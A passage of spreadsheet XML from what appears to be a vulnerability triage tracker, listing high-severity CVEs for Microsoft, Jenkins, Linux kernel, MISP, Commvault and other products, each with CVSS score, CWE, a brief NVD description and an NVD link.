          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62107</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69291</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr"/>
      <c r="Q150" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69291</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71328</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr">
        <is>
          <t>microsoft:.net, microsoft:visual_studio_2022, microsoft:visual_studio_2026, microsoft:windows</t>
        </is>
      </c>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr"/>
      <c r="Q151" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71328</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71416</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr"/>
      <c r="Q152" s="5" t="inlineStr">
        <is>
          <t>CWE-1385, CWE-287</t>
        </is>
      </c>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>Headroom compresses data before the data reaches a large language model. Prior to version 0.35.0, the Headroom WebSocket server does not validate the `Origin` header of incoming client WebSocket requests before forwarding the request to the upstream server, allowing malicious WebSocket clients to perform arbitrary LLM requests without authentication. This can be exploited by a malicious WebSocket client executed in a traditional or headless browser such as lightpanda, if the browser has access to the Headroom proxy and the OpenAI API key is stored in the `OPENAI_API_KEY` environment variable. Version 0.35.0 fixes the issue.</t>
        </is>
      </c>
      <c r="S152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71416</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72984</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr">
        <is>
          <t>microsoft:edge_chromium</t>
        </is>
      </c>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr"/>
      <c r="Q153" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Microsoft Edge (Chromium-based) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72984</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73784</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>security-alert@hpe.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr"/>
      <c r="Q154" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>A potential security vulnerability in HPE IceWall products could be exploited to tamper SAML response, allowing an attacker to impersonate another user.</t>
        </is>
      </c>
      <c r="S154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73784</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77106</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr"/>
      <c r="Q155" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>Cvlaunchd contained a missing authorization issue affecting command execution authorization. Software customers upgrade to resolved maintenance release. Update all Commvault installations, including Commserve, Webserver, Command Center, Media Agents, Clients and HyperScale X.</t>
        </is>
      </c>
      <c r="S155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77106</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77906</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_2026</t>
        </is>
      </c>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr"/>
      <c r="Q156" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77906</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78224</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr"/>
      <c r="Q157" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>The XSLT Transformer Step builds a bare TransformerFactory without the proper security options set, so XXE injection can allow data exfiltration and denial-of-service attacks.</t>
        </is>
      </c>
      <c r="S157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78224</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78462</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr"/>
      <c r="Q158" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78462</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80935</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr"/>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: bound the device EEPROM address before the EFUSE copy
mt7996_mcu_get_eeprom() derives the destination of the EFUSE/EXT block
copy from the address reported by the MCU response (event-&gt;addr, a
device-controlled __le32) and clamps only the copy length, never the
destination offset into dev-&gt;mt76.eeprom.data. A malicious or
malfunctioning device can report an arbitrary address and drive an
out-of-bounds write of up to MT7996_EXT_EEPROM_BLOCK_SIZE bytes past
eeprom.data.
Reject a response whose address would place the copy outside eeprom.data
before deriving the destination pointer. Devices that echo the requested
in-bounds offset are unaffected.</t>
        </is>
      </c>
      <c r="S159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80935</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80937</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr"/>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7915: bound the device EEPROM address before the EFUSE copy
mt7915_mcu_get_eeprom() copies a fixed EFUSE block into the driver's
dev-&gt;mt76.eeprom.data buffer at the offset reported by the MCU response
(res-&gt;addr, a device-controlled __le32) without checking it against the
buffer size. A malicious or malfunctioning device can report an arbitrary
address and drive a 16-byte out-of-bounds write past eeprom.data.
Reject a response whose address would place the copy outside eeprom.data
before deriving the destination pointer. Devices that echo the requested
in-bounds offset are unaffected.</t>
        </is>
      </c>
      <c r="S160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80937</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80989</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr"/>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: thunderbolt: Mark the connection down when bringing it up fails
Every failure path in tbnet_connected_work() undoes its own work and
returns without clearing login_sent, so the connection still looks
established. The next tbnet_tear_down() therefore takes its main branch
and repeats a teardown that already happened: it stops rings that are
already stopped, which is a dev_WARN() and fatal under panic_on_warn,
and it releases net-&gt;remote_transmit_path even on the HopID mismatch
path, where this connection never owned that id, silently freeing one
that someone else is still using.
Clear login_sent on those paths. That is enough for tbnet_tear_down() to
leave the unwound state alone, and login_received has to stay set: it
records that the peer has logged in and carries the transmit path it gave
us, which nothing on this side can make the peer send again. Two things
change beyond keeping the teardown out of the way: the logout request in
that block is no longer sent, and the peer's next login request now
re-queues our login work rather than connected_work, giving the
connection a fresh login instead of a retry on stale state.</t>
        </is>
      </c>
      <c r="S161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80989</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84645</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K162" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr"/>
      <c r="Q162" s="5" t="inlineStr">
        <is>
          <t>CWE-915, CWE-94</t>
        </is>
      </c>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>In Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, objects of types marked as storing their configuration in independent top-level configuration files in Jenkins (such as the global configuration and jobs) can appear as nested field values in user-submitted `config.xml` documents and subsequently handle HTTP requests via Stapler, resulting in remote code execution.</t>
        </is>
      </c>
      <c r="S162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84645</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84648</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K163" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr"/>
      <c r="Q163" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>In Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, the system log viewer does not escape log record metadata (source, level, and timestamp) resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers in control of agent processes.</t>
        </is>
      </c>
      <c r="S163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84648</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84650</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K164" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr"/>
      <c r="Q164" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-566</t>
        </is>
      </c>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>In Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, transient fields cannot be excluded from deserialization, allowing attackers able to submit configuration updates to specify the values of transient fields that will be deserialized, the impact depending on how those fields are used.</t>
        </is>
      </c>
      <c r="S164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84650</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85236</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr"/>
      <c r="Q165" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>A cross-site request forgery (CSRF) vulnerability existed in the cullEmptyEvents action of MISP. The endpoint performed a state-changing and irreversible operation while accepting HTTP GET requests.
Because bodyless GET requests are not subject to CakePHP's CSRF validation, an attacker could cause an authenticated MISP user with sufficient privileges to invoke the endpoint simply by causing their browser to load a crafted URL, for example through an embedded image or other automatically requested resource.
Successful exploitation triggers the deletion of published empty events. The deletion is particularly significant because the operation uses skipBlocklist, meaning the removed events do not leave blocklist entries that could prevent or track their subsequent synchronization. This can result in unintended and potentially irreversible deletion of MISP event records without explicit user interaction.
The vulnerability was addressed by restricting cullEmptyEvents to HTTP POST requests, ensuring that CakePHP's normal CSRF protections are applied to the operation.</t>
        </is>
      </c>
      <c r="S165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85236</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85677</t>
